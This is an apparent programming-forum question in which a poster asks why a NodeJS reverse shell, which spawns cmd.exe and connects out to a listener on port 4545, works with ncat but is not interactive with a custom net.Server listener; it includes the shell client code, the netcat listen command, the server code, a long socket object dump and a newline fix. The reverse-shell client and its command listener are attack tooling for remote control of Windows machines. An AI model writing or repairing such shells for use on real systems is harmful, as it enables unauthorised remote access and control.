Good morning everyone i am having a issue with reverse shell in NodeJS when i create socket and listen with netcat its perfectly work but when i create new server with net.Server i receive header of shell but it's not interactive, the shell code is like this :
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "", function(){
return /a/;
and when i listen with netcat i can get the reverse shell
ncat -nvlp 4545
but the problem arises when I want to create a TCP server in nodejs i receive the banner of cmd.exe but without interactivity
this is the code of server part :
const net = require("net");
let server = new net.Server();
server.listen({ host: '', port: 4545 }, () => {
console.log(`Server listen in 4545`);
server.on("close", () => {
console.log('connection closed')
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
this.server.listen(4545, '');
}, 2000);
server.on("connection", (socket) => {
console.log("new connection");
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
socket.on("end", () => {
console.log(`Client ${socket} disconnected`);
When i send command example 'dir' i receive an object with the pipe which is located above in the server So the question is how can i receive the result of command when i send it, example receiving the file and directory listing of socket
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
writable: true,
allowHalfOpen: false,
_sockname: { address: '', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:',
[Symbol(asyncId)]: 16
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:',
[Symbol(asyncId)]: 16
id: 790,
_peername: { address: '', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
After several attempts I managed to add \n in write to enter the code becomes so the code become
socket.write('command'+ '\n');